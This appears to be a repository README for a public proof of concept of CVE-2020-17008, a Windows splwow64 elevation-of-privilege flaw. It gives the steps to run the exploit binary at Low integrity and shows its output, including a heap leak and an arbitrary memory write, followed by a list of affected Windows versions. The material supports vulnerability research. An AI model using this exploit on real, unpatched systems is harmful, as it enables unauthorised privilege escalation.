├── README.md └── images ├── 01_Low.png └── 02_medium.png /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-17008 splWOW64 Elevation of Privilege 2 | 3 | `C:\Windows\splwow64.exe` 4 | 5 | Poc From: 6 | 7 | https://bugs.chromium.org/p/project-zero/issues/detail?id=2096 8 | 9 | 10 | ## 0x01 set splwow64_poc.exe `Low` 11 | 12 | `cd splwow64_poc\x64\Release` 13 | 14 | `icacls splwow64_poc.exe /setintegritylevel L` 15 | 16 | ![](./images/01_Low.png) 17 | 18 | ``` 19 | /setintegritylevel [(CI)(OI)]级别将完整性 ACE 显式 20 | 添加到所有匹配文件。要指定的级别为以下级别 21 | 之一: 22 | L[ow] 23 | M[edium] 24 | H[igh] 25 | 完整性 ACE 的继承选项可以优先于级别,但只应用于 26 | 目录。 27 | ``` 28 | 29 | ## 0x02 run `splwow64_poc.exe` 30 | 31 | 32 | ![](./images/02_medium.png) 33 | 34 | ``` 35 | splwow64_poc\x64\Release>splwow64_poc.exe 36 | 37 | Start 38 | ntdll = 0x7FF837980000 39 | Init done 40 | C:\Users\pwned\Desktop\splwow64_poc\x64\Release 41 | C:\Users\pwned\Desktop\splwow64_poc\x64\Release\CreateDC.exe 42 | Now's the time to hook up the debugger to splwow64.exe if you want to. Press [Enter] to continue . . . 43 | Get port name 44 | name: \RPC Control\UmpdProxy_2_bea57_0_2000 45 | Create port. 46 | Prepare 0x6A Message - OpenPrinter 47 | PtrMsgReply: 0x0000000000AB0140 48 | ClientView: 0x0000027F390B0000/0x0000000000AB0000, 0x0000027F390B0100: Microsoft XPS Document Writer 49 | Writing message 0x6A success! 50 | Cookie: 0x0 51 | Preparing 0x6D message (to leak heap address) - DocumentEvent 52 | Output: 0x0000000000000000, Heap Address: 0xFFFFFFFFFFFFFFC0 53 | Preparing 0x6D message (write to 0x41414141) - DocumentEvent 54 | Done 55 | ``` 56 | 57 | ## 影响版本 58 | 59 | ``` 60 | Windows 10 1607版(用于基于x64的系统) 61 | 适用于32位系统的Windows 10版本1607 62 | Windows 10(用于基于x64的系统) 63 | Windows 10(用于32位系统) 64 | Windows 10 1709版(用于基于ARM64的系统) 65 | Windows 10版本1709(用于基于x64的系统) 66 | 适用于32位系统的Windows 10版本1709 67 | Windows 10版本1809(用于基于ARM64的系统) 68 | Windows 10版本1809(用于基于x64的系统) 69 | 适用于32位系统的Windows 10版本1809 70 | 71 | Windows Server版本1803(服务器核心安装) 72 | Windows 10版本1803(用于基于ARM64的系统) 73 | Windows 10版本1803(用于基于x64的系统) 74 | 适用于32位系统的Windows 10版本1803 75 | 76 | Windows Server 1903版(服务器核心安装) 77 | Windows 10 1903版(用于基于ARM64的系统) 78 | Windows 10 1903版(用于基于x64的系统) 79 | 适用于32位系统的Windows 10版本1903 80 | 81 | Windows Server版本1909(服务器核心安装) 82 | Windows 10 1909版(用于基于ARM64的系统) 83 | Windows 10版本1909(用于基于x64的系统) 84 | 适用于32位系统的Windows 10版本1909 85 | 86 | Windows Server 2004版(服务器核心安装) 87 | Windows 10版本2004(用于基于x64的系统) 88 | Windows 10版本2004(用于基于ARM64的系统) 89 | Windows 10版本2004(用于32位系统) 90 | 91 | Windows Server 2016(服务器核心安装) 92 | Windows Server 2016 93 | 94 | Windows Server 2019(服务器核心安装) 95 | Windows Server 2019 96 | 97 | Windows Server 2012 98 | Windows Server 2012 R2(服务器核心安装) 99 | Windows Server 2012 R2 100 | Windows Server 2012(服务器核心安装) 101 | 102 | Windows RT 8.1 103 | Windows 8.1(用于基于x64的系统) 104 | Windows 8.1(用于32位系统) 105 | ``` 106 | -------------------------------------------------------------------------------- /images/01_Low.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2020-17008/13dac568f51a0755e763ec9496be8cadac972ce0/images/01_Low.png -------------------------------------------------------------------------------- /images/02_medium.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2020-17008/13dac568f51a0755e763ec9496be8cadac972ce0/images/02_medium.png --------------------------------------------------------------------------------